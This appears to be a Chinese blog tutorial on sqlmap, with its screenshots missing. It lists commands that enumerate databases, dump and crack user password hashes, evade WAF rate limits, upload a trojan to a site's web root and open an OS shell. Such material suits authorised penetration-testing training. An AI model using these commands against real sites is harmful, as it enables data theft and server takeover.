SQLMAP

SQLMAP介绍
在这里插入图片描述当然也可以过一些waf
sqlmap安装
在这里插入图片描述
基本的参数
在这里插入图片描述–is-dba
基本的还是
sqlmap.py -u"测试的网址"
current就是当前的
在这里插入图片描述时间延迟类型
在这里插入图片描述测得是union联合查询类型的
在这里插入图片描述这个是sqlmap跑出来的一个
第一行说的是在id参数下存在的注入
第一个 type是bool盲注
第二个 时间延迟盲注
第三个 union联合查询
在这里插入图片描述这些信息是 mysql的数据库
操作系统是 win2003或者是xp
以及php脚本版本 和mysql的版本
sqlmap.py -u"测试的网址" --is-dba(看数据库连接的到底是什么权限)
(如果access的数据库就没有必要执行这个命令 因为他是一个文件存在的)

在这里插入图片描述这个true代表的是当前的这个网站dba是管理员 这个权限是很大的
sqlmap.py -u"测试的网址" --dbs
看看当前数据库有哪些用户数据库
在这里插入图片描述这些都是数据库
sqlmap.py -u"测试的网址" --current-db
(看下当前我是哪些数据库)
在这里插入图片描述这是我们数据库的名称
sqlmap.py -u"测试的网址" --current-user
(连接的数据库用户名称)
在这里插入图片描述sqlmap.py -u"测试的网址" --users
(查看下除看这个用户,此数据库还有哪些用户)
在这里插入图片描述这些都是 其他的用户
然后
sqlmap.py -u"测试的网址" --passwords
(列一些这些用户的密码)
在这里插入图片描述这就是用户和他的密码
这个复制出来去md5破解一下就可以了
不能解出来的话 就要加载字典去破解
sqlmap.py -u"测试的网址" --table -D 数据库名
(数据库列表名,指定数据库名列表)
在这里插入图片描述
告诉你有13条表
在这里插入图片描述
sqlmap.py -u"测试的网址" --table -D 数据库名 --count
在这里插入图片描述
(统计下每个表里边有多少行,进行大体的统计下)
在这里插入图片描述
一般管理员的表里就1,2条的数据,可以根据这个特征来看
看些表少得,可能就是管理员的表
sqlmap.py -u"测试的网址" --colunmns -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名称指定表名列列名)
在这里插入图片描述
这是跑出来的列名
sqlmap.py -u"测试的网址" --dump -C 指定列名 -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名表名列名列里边的数据)
在这里插入图片描述会出现让你加载一个字典
通过你的加密方式把本地的明文加密成密文
在这里插入图片描述这样就把密文跑出来了 密码明文就是admin123

基本参数
在这里插入图片描述在这里插入图片描述
sqlmap.py -u"测试的网址" --privileges
(看当前的用户权限)
在这里插入图片描述数据库的所有权限基本都是有的
–schema是列整个系统架构的 --batch就是不提示我了 就相当于系统自动默认的yes等等
–exclude-sysdbs 把系统的数据库不列 就是系统自带的数据库

探测登级
在这里插入图片描述内容就是这样定义的
cookie就是级别是2
测http头要改成3才能测
显示调试信息
在这里插入图片描述sqlmap.py -u"测试的网址" --dbs -v 3
sqlmap.py -u"测试的网址" --tables -D xss -v 3

在这里插入图片描述
sqlmap.py -u"测试的网址" --columns -D xss -v 4
(如果想要看响应页面呢)
在这里插入图片描述一些请求包
风险登级
在这里插入图片描述
sqlmap.py -u"测试的网址" --level 3 --risk 3
(让测试的语句更全面一些)
获取目标
在这里插入图片描述 sqlmap.py -m 报的路径以及包名
(-m就是多个)
这是测试多个
在这里插入图片描述-r就是跑包
处理Google搜索结果
在这里插入图片描述用之前要挂代理
能访问谷歌在这里插入图片描述data
在这里插入图片描述在这里插入图片描述就是把后面的参数提交给前面的网址页面

–param-del
在这里插入图片描述cookie
在这里插入图片描述–referer(判断请求来源),–headers --proxy(代理)
在这里插入图片描述在这里插入图片描述时间控制
在这里插入图片描述原理就是你用工具1s访问了10次 这不可能是人在浏览 它会自动判断这是个cc攻击
所以就会waf拦截 我们要把这个每秒的访问次数调低些,这个waf就不会拦截你了
在这里插入图片描述就可以这样改下
–safe-url,–safe-freq
在这里插入图片描述不常用
-p
在这里插入图片描述–prefix --suffix
在这里插入图片描述帮助闭合

–technique
在这里插入图片描述怎么用呢
在这里插入图片描述u 指联合查询 e指显错注入 flush-session 清除缓存
(指那些方式去测试网站)
–union-cols
在这里插入图片描述sqlmap 与oracle 都是用null 来填充的
–second-order
在这里插入图片描述如果遇到了二阶注入的类型
指定它回显示从哪里开始的
–dump-all,–exclude -sysdbs
在这里插入图片描述–search -C -T -D
在这里插入图片描述主动的直接去搜索表名
在这里插入图片描述结果有两种 一个是模糊匹配 一个是完整匹配
在这里插入图片描述
1就是模糊匹配 2就是完整匹配
-udf-inject shared-lib
在这里插入图片描述-s -t
在这里插入图片描述-batch
在这里插入图片描述–flush-session
(清楚缓存)
在这里插入图片描述–output-dir
(保存路径的).
在这里插入图片描述–smart --mobile
在这里插入图片描述–identify-waf ,–check-waf
在这里插入图片描述注册表操作
在这里插入图片描述不建议改,可能会改崩
暴力破解表名

在这里插入图片描述
在这里插入图片描述暴力破解列名
在这里插入图片描述post登录框注入
在这里插入图片描述所搜框注入
在这里插入图片描述
伪静态
在这里插入图片描述延迟注入
在这里插入图片描述
base6编码
在这里插入图片描述
执行sql语句
在这里插入图片描述看下版本
在这里插入图片描述
在这里插入图片描述
读文件
into outfile 写文件
文件读写
在这里插入图片描述在这里插入图片描述用法
文件上传
在这里插入图片描述就是个上传的方式
在这里插入图片描述把自己的木马文件上传到网站的根目录下
命令执行
在这里插入图片描述记住–os-shell重要
在这里插入图片描述4个路径
依次是默认结构路径
自定义路径
加载目录列表进行爆破
暴力搜索.
在这里插入图片描述选择的第二个路径 上传文件
导出数据
在这里插入图片描述
WAF绕过
在这里插入图片描述配合msf使用
在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页